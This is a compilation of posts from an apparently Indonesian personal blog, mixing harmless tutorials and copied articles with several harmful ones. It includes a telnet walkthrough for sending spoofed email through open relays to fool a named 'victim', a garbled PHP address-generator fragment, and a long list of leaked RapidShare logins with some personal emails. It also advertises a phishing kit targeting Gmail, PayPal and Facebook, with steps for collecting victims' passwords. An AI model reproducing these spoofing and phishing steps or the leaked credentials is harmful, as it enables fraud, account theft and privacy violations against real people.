Fake Email [How to]

menyambut Holiday dan christmas pasti banyak tuh nerima Fakemail atau biasa disebut dengan “email palsu” ;adalah email yang dikirim oleh seseorang kepada orang lain dengan menggunakan identitas palsu. Fakemail biasa dikirim dengan memanfaatkan SMTP Server yang Open Relay. Mungkin kamu pernah menerima email dengan alamat domain yang unik seperti: me@anywhere.com, I@Love.you c@ke.p atau bahkan alamat pengirim adalah alamat anda sendiri dan tak jarang terdisplay [nobody] (hal ini dikarenakan sang sender tidak mengisi form From

mungkin kita perlu tau sedikit
berikut cara-caranya :

1. menggunakan telnet

Klik START – RUN lalu ketik TELNET

=========================
C:\WINDOWS\Ssytem32\telnet.exe
=========================
Welcome to Microsoft Telnet Client

Escape Character is 'CTRL+J'

Microsoft Telnet>
---> ketik 'o' = Untuk connect ke server yang dituju.
<>
--->ketik 'mail.terserah.com 25' = mail server yang dituju

<> mail.terserah.com 25
Connecting To mail.terserah.com...
Connected...

Mail.terserah.com is xxx.xxx.xxx
--->ketik 'helo mail.terserahkamu.com'

Helo mail.terserahkamu.com pleased to meet you

--->ketik 'mail from':(nama korban )@terserah.com'=Contoh 'mail from:

anyone@anywhere.com'.
OK

--->ketik 'rctp to':(nama sang korban)@terserah.com' =Contoh 'rcpt
to:korban@terserah.com'.

OK
--->ketik 'Subject:'= isi subjectnya
--->ketik 'From:'= isi nama terserah anda,contoh: ADMIN
--->ketik 'X-Mailer:'= tulis mailer ,seperti :Micorosft outlook = Supaya jika sang korban merply suratmu, surat akan dikembalikan.
--->ketik Pesannya…

Balablabla…
Dari,
ADMIN [biar meyakinkan gitu..... :) ]

--->klik enter 2x untuk mengakhiri email


Send 37368232982 ,OK

--->ketik 'Quit' = Disconnect dari mail server


2. menggunakan script PHP [fungsi SendMail]

PHP memiliki fungsi sendmail yang memungkinkan kita untuk mengirim email tanpa MYSQL. Kita hanya tinggal mencari domain hosting yang mengizinkan PHP Script. Berikut contoh script PHP-nya

";
$divende ="
";
$name ='';
$domain ='';
$tld ='';
$mail = array();
$block ='';
srand ((double)microtime()*100000);
for($j=0;$j<$anz;$j++) { for($i=0;$i<$anzname;$i++) { $awert = rand(0,23); $name.= $alpha[$awert]; } for($i=0;$i<$anzdomain;$i++) { $awert = rand(0,23); $domain.= $alpha[$awert]; } for($i=0;$i<$anztld;$i++) { $awert = rand(0,23); $tld.= $alpha[$awert]; } $mail[$j]="".$name.$at.$domain.$dot.$tld."
\n";
$name='';
$domain ='';
$tld='';
}
for($k=0;$k<>

demikian pembahasan kali ini, leave comment jika ada yang nggak ngerti

McAfee Update Manual

DAT files are universal for all McAfee products and represent the latest virus definition files. Automated updates work well, but sometimes they may not complete properly and McAfee offers a manual update capability if needed.

STEPS using XDAT files

1. Each Thursday - Go to this Internet site:

Downloads - Updates (SDATs, engine - but labled as 4240)
http://www.networkassociates.com/us/downloads/updates/
DAT updates (different languages)
http://www.networkassociates.com/us/...pdates/dat.asp
Corporate FTP (these DATs works for home versions also)
ftp://ftp.nai.com/virusdefs/4.x


2. Find file name: 4225xdat.exe and click
on it
(Next week, look for 4226xdat.exe, then 4227xdat.exe)
3. Click SAVE
4. Select a folder on your hard drive to save it into
5. Once the download is complete, find this folder on your hard drive and double click on the "globe" icon
6. Click NEXT and the SuperDAT utility program updates everything automatically.
7. Click FINISH (and REBOOT only if prompted but this will not be often).

After these 7 STEPS, you will be completely up-to-date.

Note - if you skip a few weeks, going to latest DAT files catches you up. For example DAT 4225 contains protection for over 61,000+ viruses.

[source: harrywaldron on McAfee forum]

Ucapan Selamat Ulang Tahun

This is Another Ucapan Selamat Ulang Tahun sent via Short Message Service [SMS]

Pelangi senja di langit jingga
Awan menari lembayung tertawa
menyambut hari indah telah tiba
sebait kalimat seribu Doa.
Hanya untuk mu belahan jiwa.

HAPPY BIRTHDAY MY SWEET LOVE....

wish you the best,
best life, best career, best health
best jodoh, best iman N islam,
+ Semoga Allah semakain sayang padamu
selamanya..........


copyright® [Oby_One®] sent via sms date: April,21 2008 ;12:03:21 AM

Game [pick the right one...]

A video game is an electronic game that involves interaction with a user interface to generate visual feedback on a video device. The word video in video game traditionally referred to a raster display device.[1] However, with the popular use of the term "video game", it now implies any type of display device. The electronic systems used to play video games are known as platforms; examples of these are personal computers and video game consoles. These platforms are broad in range, from large computers to small handheld devices. Specialized video games such as arcade games, while previously common, have gradually declined in use.




The input device normally used to manipulate video games is called a game controller, which varies across platforms. For instance, a dedicated console controller might consist of only a button and a joystick, or feature a dozen buttons and one or more joysticks. Early personal computer based games historically relied on the availability of a keyboard for gameplay, or more commonly, required the user to purchase a separate joystick with at least one button to play.[citation needed] Many modern computer games allow the player to use a keyboard and mouse simultaneously. Emulation software, used to run software without the original hardware, are popular for their ability to play legacy video games without the consoles or operating system for which they were designed. Console emulators such as NESticle and MAME are relatively commonplace, although the complexity of modern consoles such as the Xbox or Playstation makes them far more difficult to emulate, even for the original manufacturers.[34]

Most emulation software mimics a particular hardware architecture, often to an extremely high degree of accuracy. This is particularly the case with classic home computers such as the Commodore 64, whose software often depends on highly sophisticated low-level programming tricks invented by game programmers and the demoscene.

Beyond the common element of visual feedback, video games have utilized other systems to provide interaction and information to the player. Chief examples of these are sound reproduction devices, such as speakers and headphones, and an array of haptic peripherals, such as vibration or force feedback.

In common use a "PC game" refers to a form of media that involves a player interacting with a personal computer connected to a high-resolution video monitor. A "console game" is played on a specialized electronic device that connects to a standard television set or composite video monitor. A "handheld" gaming device is a self contained electronic device that is portable and can be held in a user's hands. "Arcade game" generally refers to a game played on an even more specialized type of electronic device that is typically designed to play only one game and is encased in a special cabinet. These distinctions are not always clear and there may be games that bridge one or more platforms. Beyond this there are platforms that have non video game variations such as in the case of electro-mechanically based arcade machines. There are also devices with screens which have the ability to play games but are not dedicated video game machines (examples are mobile phones, PDAs and graphing calculators).

A video game, like most other forms of media, may be categorized into genres based on many factors such as method of game play, types of goals, and more. Because genres are dependent on content for definition, genres have changed and evolved as newer styles of video games are created. As the production values of video games have increased over the years both in visual appearance and depth of story telling, the video game industry has been producing more life-like and complex games that push the boundaries of the traditional game genres. Some genres represent combinations of others, such as massively multiplayer online role-playing games. It is also common to see higher level genre terms that are collective in nature across all other genres such as with action or horror-themed video games. This is a list of genres: Action,FPS (first person shooter). strategy, RPG (Role Playing Game), and MMO or Massively Multiplayer Online [game]

Video games are primarily meant for entertainment. However, some video games are made (at least in part) for other reasons. These include advergames, educational games, propaganda games (e.g. militainment), and others. Many of these fall under the category of serious games.

Games running on a PC are often designed with end-user modifications in mind,[citation needed] and this consequently allows modern computer games to be modified by gamers without much difficulty. These mods can add an extra dimension of replayability and interest. The Internet provides an inexpensive medium to promote and distribute mods, and they have become an increasingly important factor in the commercial success of some games.[citation needed] Developers such as id Software, Valve Software, Crytek, Epic Games and Blizzard Entertainment ship their games with the very development tools used to make the game in the first place, along with documentation to assist mod developers, which allows for the kind of success seen by popular mods such as the (previously) Half-Life mod Counter-Strike.

video game has traditionally been a social experience. From its early beginnings, video games have commonly been playable by more than a single player. Multiplayer video games are those that can be played either competitively or cooperatively by using either multiple input devices, or by hotseating. Tennis for Two, arguably the first video game, was a two-player game, as was its successor Pong. The first commercially available game console, the Magnavox Odyssey, had two controller inputs.

Since then, most consoles have been shipped with two or four controller inputs. Some have had the ability to expand to four, eight or as many as twelve inputs with additional adapters, such as the Multitap. Multiplayer arcade games typically feature play for two to four players.

Many early computer games for non-PC descendant based platforms featured multiplayer support. Personal computer systems from Atari and Commodore both regularly featured at least two game ports. PC-based computer games started with a lower availability of multiplayer options because of technical limitations. PCs typically had either one or no game ports at all. Network games for these early personal computers were generally limited to only text based adventures or MUDs that were played remotely on a dedicated server. This was due both to the slow speed of modems (300-1200-bit/s), and the prohibitive cost involved with putting a computer online in such a way where multiple visitors could make use of it. However, with the advent of widespread local area networking technologies and Internet based online capabilities, the number of players in modern games can be 32 or higher, sometimes featuring integrated text and/or voice chat. MMOs can offer extremely high numbers of simultaneous players; Eve Online set a record with just under 36,000 players on a single server in 2006.

It has been shown that action video game players have better visuomotor skills, such as their resistance to distraction, their sensitivity to information in peripheral vision, and their ability to count briefly presented objects than nonplayers. They found that such enhanced abilities could be acquired by training with an action game, involving challenges to switch attention to different locations, but not with a game requiring concentration on single objects.

In Steven Johnson's book, Everything Bad Is Good For You, he argues that video games in fact demand far more from a player than traditional games like Monopoly. To experience the game, the player must first determine the objectives, as well as how to complete them. They must then learn the game controls and how the human-machine interface works, including menus and HUDs. Beyond such skills, which after some time become quite fundamental and are taken for granted by many gamers, video games are based upon the player navigating (and eventually mastering) a highly complex system with many variables. This requires a strong analytical ability, as well as flexibility and adaptability. He argues that the process of learning the boundaries, goals, and controls of a given game is often a highly demanding one that calls on many different areas of cognitive function. Indeed, most games require a great deal of patience and focus from the player, and, contrary to the popular perception that games provide instant gratification, games actually delay gratification far longer than other forms of entertainment such as film or even many books. Some research suggests video games may even increase players' attention capacities.

Learning principles found in video games have been identified as possible techniques with which to reform the U.S. education system. It has been noticed that gamers adopt an attitude while playing that is of such high concentration, they don't realize they're learning- and that if the same attitude could be adopted at school, education would enjoy significant benefits. Students are found to be "learning by doing" while playing video games while fostering creative thinking.

The U.S. army has deployed machines such as the PackBot which makes use of a game-style hand controller intended to make it more familiar to use by young people.

According to research discussed at the 2008 Convention of the American Psychological Association, certain types of video games can improve the gamers’ dexterity as well as their ability to problem-solve. A study of 33 laparoscopic surgeons found that those who played video games were 27 percent faster at advanced surgical procedures and made 37 percent fewer errors compared to those who did not play video games. A second study of 303 laparoscopic surgeons (82 percent men; 18 percent women) also showed that surgeons who played video games requiring spatial skills and hand dexterity and then performed a drill testing these skills were significantly faster at their first attempt and across all 10 trials than the surgeons who did not play the video games first.

Whilst many studies have detected superior mental aptitudes amongst habitual gamers, research by Walter Boot at the University of Illinois found that non-gamers showed no improvement in memory or multitasking abilities after 20 hours of playing three different games. The researchers suggested that "individuals with superior abilities are more likely to choose video gaming as an activity in the first place".

more, more..... Rapidshared Account [UPDATE]

here is Another Rapidshared Account that I got over another Blog, mostly still working until NOVEMBER 2009 ;), Dont you Just love me.... :)

-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
UserID Password Expiration RapidPoints email [only a few....]

5314 4375910 Wed, 24. Jun 2009 923
1091077 10688182 Sun, 14. Jun 2009 2030 taran@student.westminster.ac.uk
helios9558 twelttc Sat, 13. Jun 2009 9 picmaus@gmail.com
ryanea81 scalpy Tue, 2. Jun 2009 4006
1261924 855309071 Wed, 22. Apr 2009 0 jvanfeus@hetnet.n
4428840 2yEAsveHCu Tue, 21. Apr 2009 8000 clc75@verizon.net
1244853 bigloo1001 Wed, 25. Feb 2009 11408
bauer6210 sallyp Tue, 24. Feb 2009 7059
7303316 DNvyffY2 Tue, 17. Feb 2009 3000
1509319 katiesucks Fri, 6. Feb 2009 3000
midasstingray badmutha Sun, 1. Feb 2009 69
864502 5FUtdvUg Fri, 30. Jan 2009 8671
7071774 EEhDtMaYbz Fri, 30. Jan 2009 3000
TheReDnBlack1 edmond1 Thu, 29. Jan 2009 8000
136303 idontknow Wed, 21. Jan 2009 1991
5912049 jhNZ4CmtL7 Sun, 18. Jan 2009 1000
393183 611500 Wed, 6. May 2009 2000
1778067 MT9QCWIqr5 Sun, 4. Jan 2009 1000
6677024 gzhUCqeu2R Thu, 1. Jan 2009 3000
kaone munyinyi Tue, 30. Dec 2008 2020
6607533 VPTfSmxYKt Fri, 26. Dec 2008 3000
3671889 LwENkMSHAx Tue, 23. Dec 2008 7000
mycathatesyou oicu812oicu812 Sat, 14. Mar 2009 4012
4623301 yTnX5rw3Qw Sat, 7. Mar 2009 5000
4866545 9jScfUjcHU Sat, 28. Feb 2009 4000
2921560 UT4NqdA5rk Thu, 26. Feb 2009 1000
7343911 b9nY9WfP Fri, 20. Feb 2009 3000
7303316 DNvyffY2 Tue, 17. Feb 2009 3000
3699984 2421181 Sat, 14. Feb 2009 6514
7167047 S3wfmTve Tue, 9. Dec 2008 1000
7172380 mm557Fh7 Tue, 9. Dec 2008 0
7170033 8WAzU59c Tue, 9. Dec 2008 1000
rvemuri 1326_82 Tue, 9. Dec 2008 6226
4689430 QBZycw Mon, 8. Dec 2008 3000
6413340 Q3zZdMjFft Mon, 8. Dec 2008 3000
Gonza ignacio Mon, 8. Dec 2008 1001
4600538 URPBWLPJU5 Sun, 7. Dec 2008 2002
3925062 eus3ZAQYj8 Sun, 7. Dec 2008 4000
303574 5757156 Sun, 7. Dec 2008 8000
7146218 3w9jjaEd Sun, 7. Dec 2008 1000
412899 211090 Sat, 6. Dec 2008 6561
6409668 130589 Sat, 6. Dec 2008 3000
6387033 wgMAWUVhmv Fri, 5. Dec 2008 3000
7111974 hPj9WL7n Thu, 4. Dec 2008 0
mouritsas 5008946 Fri, 4. Dec 2009 14015
566136 879338 Wed, 3. Dec 2008 9038
Batocorp submite19 Tue, 2. Dec 2008 1001
7078640 hLbFz8GXu8 Tue, 2. Dec 2008 1000
7407237 3FJhzYdT Fri, 27. Nov 2009 2000
1145625 646741555 Sun, 27. Sep 2009 8000
feest feestvreugde Fri, 25. Sep 2009 7136
6246179 2GmwfmXYuE Sun, 23. Aug 2009 2001 pnuthall@sky.com
rurounikenshin gokugohanfernanda Thu, 9. Jul 2009 8111
2342214 23car04 Mon, 8. Jun 2009 217
7300965 audis4cabrio Mon, 18. May 2009 5443
4619927 N5ZBkVMxGw Fri, 8. May 2009 8004 willcyoung@hotmail.com
2699850 9SPFB6ZAxM Wed, 6. May 2009 4000
3632646 fK2c5TUBFV Thu, 30. Apr 2009 1
7069891 96x6UQQhee Thu, 30. Apr 2009 6000
4505244 L9TYn44WVt Mon, 27. Apr 2009 8000

Username = ghettomexisbunny
Password = vishal
Expiration date: Fri, 2. Jan 2009

Username = princeteja
Password = vangogh
Expiration date: Sat, 28. Feb 2009

User : 2945163
Password : salzfass
Expiration date: Mon, 6. Apr 2009

Username: 3127922
Password: joekasaduki123
Expiration date: Wed, 25. Feb 2009

username: 3887120
Password: J3qayC7Wpb
Expiration date: Sun, 18. Jan 2009

Login: Razor@InWarez7
Password: 123123123
Expiration date: Thu, 8. Jan 2009

USERNAME=5866060
PASSWORD=precepa75
Expires Monday 23rd Feb 2009 [+ 55Gig] DL Traffic Left

Username= 2620176
Password = enjoy
Expiration date: Wed, 3. Dec 2008

Login : 7050479
Password : s28PtjeNda
Expiration date: Sun, 30. Nov 2008

Login : mycathatesyou Password : oicu812oicu812
Expiration date: Sat, 14. Mar 2009

Login : 393183 Password : 611500
Expiration date: Wed, 6. May 2009

Login : 6677024 Password : gzhUCqeu2R
Expiration date: Thu, 1. Jan 2009

Login : 3671889 Password : LwENkMSHAx
Expiration date: Tue, 23. Dec 2008

Login : 6305491 Password : polizei5
Gültig bis: Thu, 26. Feb 2009

Username = 3699984
Password = 2421181
Expiration date: Sat, 14. Feb 2009

Login: 7358972
Password: LyYbQFku
Expiration date: Mon, 23. Mar 2009

Login: 7116275
Password: vW8wZE9e
Expiration date: Thu, 5. Mar 2009

Username= 384563
Password= 3390
Expiration date: Sat, 20. Dec 2008

Username= 3765948
Password= JNex63xzUd
Expiration date: Sat, 21. Feb 2009

Username=7167047
Password=S3wfmTve
Expiration date: Tue, 9. Dec 2008

Username: 5651248
Password: CbZxNyKVpc
Expiration date: Mon, 29. Dec 2008

accountid=7075028
password=pLkfqf7rgC
Expiration date: Tue, 2. Dec 2008

Login : 174585
Password : pwned1337
Expiration date: Thu, 10. Dec 2009

Login : 7041519
Password : QCKjWFQNSc
Expiration date: Sat, 29. Nov 2008

Login : 3535979
Password : 3X6yvphCMe
Expiration date: Fri, 30. Jan 2009

Login : 3765948
Password : JNex63xzUd
Expiration date: Sat, 21. Feb 2009

Login : 7258898
Password : CthhVd
Expiration date: Tue, 16. Dec 2008

Login : 7258899
Password : F54nS8
Expiration date: Tue, 16. Dec 2008

Login : 7258900
Password : xnSraJ
Expiration date: Tue, 16. Dec 2008

Login : 3535979
Password : 3X6yvphCMe
Expiration date: Fri, 30. Jan 2009

Login : 7014973
Password : 2RNWSqYVZt
Expiration date: Thu, 27. Nov 2008

Login : 7041519
Password : QCKjWFQNSc
Expiration date: Sat, 29. Nov 2008

Login : 5682804
Password : deD47FgAUh
Gültig bis: Sun, 30. Nov 2008

Login : 7116275
Password : vW8wZE9e
Expiration date: Thu, 5. Mar 2009

Login : 6979707
Password : nRrYFMW8rB
Expiration date: Mon, 29. Dec 2008

Login : 6293059
Password : mCsKd8fTDE
Expiration date: Sun, 31. May 2009

Login : 2632870
Password : KQtga3eTsp
Expiration date: Sun, 8. Feb 2009

Login : 3983083
Password : RonnieIsACrybaby
Expiration date: Fri, 11. Sep 2009

Username: 6703584
Password: google
Gültig bis: Sat, 3. Jan 2009

Username=7167047
Password=S3wfmTve
Expiration date: Tue, 9. Dec 2008

Username: 5651248
Password: CbZxNyKVpc
Expiration date: Mon, 29. Dec 2008

accountid=7075028
password=pLkfqf7rgC
Expiration date: Tue, 2. Dec 2008

accountid=salihbalci
password=sl06172001
Expiration date: Mon, 8. Dec 2008

accountid=1827871
password=c0v3ntry07
Expiration date: Sat, 6. Dec 2008

User: 3411911
Pass: 4wLSjufUJ6
Expiration date: Fri, 20. Mar 2009

Login:Batocorp
Pass :submite19
Expiration date: Tue, 2. Dec 2008

Login:566136
Pass :879338
Expiration date: Wed, 3. Dec 2008

Login: 7116275
Password: vW8wZE9e
Expiration date: Thu, 5. Mar 2009

Login: 6979707
Password: nRrYFMW8rB
Expiration date: Mon, 29. Dec 2008

Login: 6293059
Password: mCsKd8fTDE
Expiration date: Sun, 31. May 2009

Login: 5682804
Password: deD47FgAUh
Gültig bis: Sun, 30. Nov 2008

Login: 7050479
Password: s28PtjeNda
Expiration date: Sun, 30. Nov 2008

IF YOU LIKE THIS POST, PLEASE CLICK ONE OF MY SPONSOR ABOVE TO KEEP ME POSTING A BETTER ARTICLE

Have fun with that, some or most "RAPIDSHARED SECURITY" All ready ACTIVE :(

Rapidshared Account "UPDATE"

here is Rapidshared Account.... the new one,It work until the end of December 2008

|
|
|
|
|
|
|
|
|
|
|
|

|
|
|
|
|
* Username = 7393026
* Password = 3xarchive

* Username = 2612431
* Password = 5Fr5zc

use with wisely.... For more Account in the Future keep visit this blog...
leave a message or comment if not work

What are R5, R3, DVD Screener[DVDscr], Telecine, Telesync, Cam, DVDRip, VHSRip, TVRip, WorkPrint[WP], DivX Re-Enc for...?

Thispost I specially for those people who like to download movie for over internet via web hosting like Rapidshared, Easyshare, Megaupload etc, so you need this info before you download..... for the result you will get the movie with hiqh quality picture and sound.

Telecine (TC)

A telecine machine copies the film digitally from the reels. Sound and picture should be very good, but due to the equipment involved and cost telecines are fairly uncommon. Generally the film will be in correct aspect ratio, although 4:3 telecines have existed.

R5 or R3

R5 releases differ from normal releases in that they are a direct Telecine transfer of the film without any of the image processing. They take the information from the DVD disc and sync it to an English version of the film, usually a Russian R5 released version. Which means that the sound often isn’t as good as DVDRips. In some cases, R5 DVDs may be released without an English audio track, requiring pirates to use the direct line audio from the film’s theatrical release. Quality is DVDSCR or better. usually Europe country who make R5 dan R3.

DVD Screener ( DVDScr)

Same premise as a screener, but transferred off a DVD. Usually letterbox , but without the extras that a DVD retail would contain. The ticker is not usually in the black bars, and will disrupt the viewing. If the ripper has any skill, a DVDscr should be very good. Usually transferred to SVCD or DivX/XviD.


Telesync (TS)

A telesync is the same spec as a CAM except it uses an external audio source (most likely an audio jack in the chair for hard of hearing people). A direct audio source does not ensure a good quality audio source, as a lot of background noise can interfere. A lot of the times a telesync is filmed in an empty cinema or from the projection booth with a professional camera, giving a better picture quality. Quality ranges drastically, check the sample before downloading the full release. A high percentage of Telesyncs are CAMs that have been mislabeled.


Cam

A cam is a theater rip usually done with a digital video camera. A mini tripod is sometimes used, but a lot of the time this wont be possible, so the camera may shake. Also seating placement isn't always idle, and it might be filmed from an angle. If cropped properly, this is hard to tell unless there's text on the screen, but a lot of times these are left with triangular borders on the top and bottom of the screen. Sound is taken from the on board microphone of the camera, and especially in comedies, laughter can often be heard during the film. Due to these factors picture and sound quality are usually quite poor, but sometimes we're lucky, and the theater will be fairly empty and a fairly clear signal will be heard.

DVDRip

A copy of the final released DVD. If possible this is released PRE retail (for example, Star Wars episode 2) again, should be excellent quality. DVDrips are released in SVCD and DivX/XviD.

VHSRip

Transferred off a retail VHS, mainly skating/sports videos and XXX releases.

TVRip

TV episode that is either from Network (capped using digital cable/satellite boxes are preferable) or PRE-AIR from satellite feeds sending the program around to networks a few days earlier (do not contain “dogs” but sometimes have flickers etc) Some programs such as WWF Raw Is War contain extra parts, and the “dark matches” and camera/commentary tests are included on the rips. PDTV is capped from a digital TV PCI card, generally giving the best results, and groups tend to release in SVCD for these. VCD/SVCD/DivX/XviD rips are all supported by the TV scene.

WORKPRINT (WP)

A workprint is a copy of the film that has not been finished. It can be missing scenes, music, and quality can range from excellent to very poor. Some WPs are very different from the final print (Men In Black is missing all the aliens, and has actors in their places) and others can contain extra scenes (Jay and Silent Bob) . WPs can be nice additions to the collection once a good quality final has been obtained.

DivX Re-Enc

A DivX re-enc is a film that has been taken from its original VCD source, and re-encoded into a small DivX file. Most commonly found on file sharers, these are usually labeled something like Film.Name.Group(1of2) etc. Common groups are SMR and TND. These aren’t really worth downloading, unless you’re that unsure about a film u only want a 200mb copy of it. Generally avoid.

Create iTunes account without credit card

Today we can learn to create iTunes store account without credit card or payal account etc

This topic has been written especially for Indians. Bcoz in India iTunes store account can only be created with either credit card or paypal account entered during registration . But this also suitable for any guy from any nation
And here we go.. Get set go

1.Open iTunes
2. Click iTunes store and when it is loaded u can see create account at the top right ofthe page
3. Click create account and then u will be asked for license aggrement.
4. On the license aggrement page u can see a question called "is your billing address in India"
5. Click India and you will be given option to change the country
6. Click UK (England) in it
7. Now you will be directed to UK iTunes store
8. Now when main page(itunes store page) loads u can see Redeem link at the same right corner
9. click it and u will be asked for a serial number
10. Now open browser and go to this link "http://www.tunecore.com/freealbum" and it will generate a redeem code for u.
11. Copy and paste in iTunes and click Redeem at iTunes an it ask to create account.
12. now in payment options you can see a option "none"select it and enter the personel details .
13. remember to give UK authorized PIN code else it will not create.
for that google hotels at UK and copy some hotel PIN code from its address and paste it
14. thats it u have created ur iTunes account for free.

Note: If tuncore.com doesnt generate code go to Facebook and create account and join "Apple Students"group for free. In this group people give redeem code frequently. use that..

it's this post usefull then give a commnet or DONATE maybe.... :) :D

Free Gift

yes, this is a free gift that I got from over internet[for this time... :) I don't know for the future,I'm still looking he he he he ....;) ], no money was spended, just sign in, complete the address and your done.

here is the picture preview:

first fee gift was U-Buntu CD.It comes from Netherlands, as can you see in the picture below there is ubuntu, kubuntu, edubuntu, ubuntu server compact disc, you can choose kind of CD/series you request for. In my case I take ubuntu. Package include: 1 CD[as you request]+sticker ubuntu [4 pcs] www.canonical.com and www.ubuntu.com



second gift was a Ferrari Formula One Sticker, it's not much but it's kindda cool :) ;)
package include just like in the picture below.www.shell.com/motorsport





any commnet, question, NEW FREE GIFT. you have to let me know,why.......???? coz i have give you one :D

How to post using Microsoft Office 2008

kali ini saya akan mencoba menerangkan bagaimana cara memposting dengan menggunakan Microsoft Word 2007, jadi dengan kata lain dapat mengurangi lamanya akses ke internet dimana harus buka websitenya dulu, login, dan belum lagi lambatnya koneksi disamping harus memposting ke beberapa blog, dalam kasus ini kita akan membahas pada Blogspot dan Wordpress yang dapat digunakan sekaligus.

here is step by step:
1. pertama buka Microsoft Word 2007. New file > new post>
jika belum ada account yang ter-save maka aka ada tampilan login yang harus anda isikan sesuai dengan tempat postingan anda, apakah blogger atau wordpress, jadi sesuaikan saja.ini dia screen shoot-nya:




2.selanjutnya setelah proses login selesai maka, akan ada Blank dokumen tempat ada menuliskan postingan anda. Saran saya sebaiknya anda sesuaikan dahulu line space-ing nya sehingga saat anda akan memposting maka jarak tulisan anda tidak terlalu lebar [ anda akan mengerti setelah melakukan posting dari MSword 2007 jika tidak mengatur line space dan dengan MENGATUR line spacing :) ]



3. untuk yang memiliki banyak blog, maka memposting dengan Microsoft Word 2007 sangat membantu karena tidak harus sign in dan sign out untuk masuk ke dalam account yang berbeda, tinggal pilih saja dari MS word 2007 blog mana yang ingin anda update. Mudah kan..... :)

setelah melakukan posting kita tinggal meng-close MS Word 2007 dan untuk postingan selanjutnya kita tinggal membuka new file>new blog post tanpa ada permintaan password lagi.

sekian dulu tutorial ini, mungkin ada yang kurang jelas dapat ninggalin comment.Have a nice day

How to Hide Folder

in this tutorial, I will post hoe to hidden folder without using any software, just edit this file an your done... Enjoy

Quote: cls
@ECHO ON
title Folder Mine
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Mine goto MDLOCKER

:CONFIRM
echo Are you sure you want to lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Mine "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to unlock folder
set/p "pass=>"
if NOT %pass%== LeNK goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Mine
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Mine
echo Private created successfully
goto End
:End

Note: save the syntax on something *.Bat
that's it, just read carefully if you don't understand you can leave a message on the shoutmix.

The RapidShare Security

Rapidshared update....

Wow... itu yang pertama terbayang di pikiran gw, Rapidshared terus meng-update tentang keamanan para Penggunanya terutama yang punya Account Premium. Bayangin aja pas hari ini [14 November 2008] gw Log in ke Premium Account gw... eh udah ada tampilan baru lagi mengenai the RapidShare Security.

here's pic.Preview




the RapidShare Security, yup...jadi intinya, biarpun lu dapat Account and dapat login kedalam-nya, lu pada nggak bisa ngapa-ngapain, alias just looking around aja :D :D :D

jadi begini, misal ada account yang dishare dengan beberapa orang, otomatis yang mengetahui Code dari rapidshare security-lah yang punya otoritas lebih [ADMIN] di account bersama tersebut dan untuk kedepan kayaknya nggak ada effect lagi buat phising. atau cara satu-satunya, lu harus tau address email si pengguna buat register di rapidshared dan lu harus Hack tu Account.

MY SUGGEST: Kalo lu pada udah Beli Account Premium, langsung lu set-lah Code di Rapidshared security nya, biar kalo lu lupa Logout di warnet atau dimana gitu, yang dapat account lu cuman bisa liat file-file lu pada, tanpa bisa mengganti atau merubah password lu...jadi paling banter file-file yang lu upload yang di delete... :) :D

jadi kesimpulannya adalah, ada login didalam login [NAH LHO...] tapi gw nggak tau apa mungkin dijebolin lagi ini security, coz nggak ada sesuatu di dunia maya itu yang secure only your feeling makes it secure...Have A nice Day...

Phishing

I just contribute this file what I got from the Net, and I think this is COOL :) :), so beware .....!!!!!!

DISCLAIMER:
"The Author Of This Guide Is NOT Responsible For ANYTHING You Do With This , I encourage you not to use any of this. It was only created for educational purposes and to demonstrate how web pages are vulnerable. If you EVER see a phisher please report it.PHISHERS ARE ILLEGAL. "



---What is a phisher---
Basically a phisher is a fake login page, that is made to look exactly like the real login page of the real website so as to fool somebody into entering their information and sending it to you.

---How can I get somebody to login to my phisher---
That's for you to find out, use your mind. Probably the simplest way is Social Engineering and some phishing skill Here.

---How to use---
Find a web host that supports php.
Upload all of the files to your web hosting.
Goto the link and it should show the login if you uploaded it in the root directory.Send your victim the Index page. To get the passwords they enter goto yoursite.yourhostname.com/passwords.txt, or whatever the name of your text file is.

And Any Other Community Out there Basically. Its all about Mixing :)



Pack include:

-AnonymousMailer
-Phisher Maker! Read the ReadMe.txt
-Jiffy Gmail Account Creator - Create GMAIL acc for setting up hosting acc etc.
-Tarantula a Powerful software to extract e-mail addresses
-RapidExtract
-IP Hider Pack - Read the ReadMe.txt
-St_eam Phiser
-Friendster Phiser
-Gmail Phisher
-Habbo Phisher
-Facebook Phisher
-Photobucket Phisher
-XboxLive Phisher
-AIM Phisher
-GaiaOnline Phisher
-IMVU Phisher
-AstaTalk Phisher
-Warez-bb Phisher
-Hotmail Phisher
-Paypal Phisher
-Runescape Phisher
-youtube Phisher

also Forum, Website for place your Project test :)

and many many more.....

FootMouse

Tugas Kuliah ne.... :) :)

Footmouse adalah suatu jenis "mouse" komputer yang memungkinkan para pemakainya untuk memindahkan "cursor", meng-click dengan menggunakan kaki mereka.

Terutama digunakan oleh para pemakai dengan kemampuan terbatas (cacat) atau yang memiliki permasalahan dengan leher. dan juga sebagai media Promosi untuk mengatasi masalah di masa-masa mendatang, dimana untuk mengurangi produktifitas menggerakkan tangan antara menggunakan keyboard dan mouse.

Ada sekitar sepuluh macam jenis footmouse. namun tidak semuanya tersedia di pasaran. Beberapa perusahaan, khusus mendisain footmouse untuk orang-orang yang membutuhkannya, dengan memperhatikan bentuk kaki para penggunanya.

Perbedaan yang paling utama dari jenis footmouse ini adalah terdapat pedal lurus dan miring, yang saling terhubung.





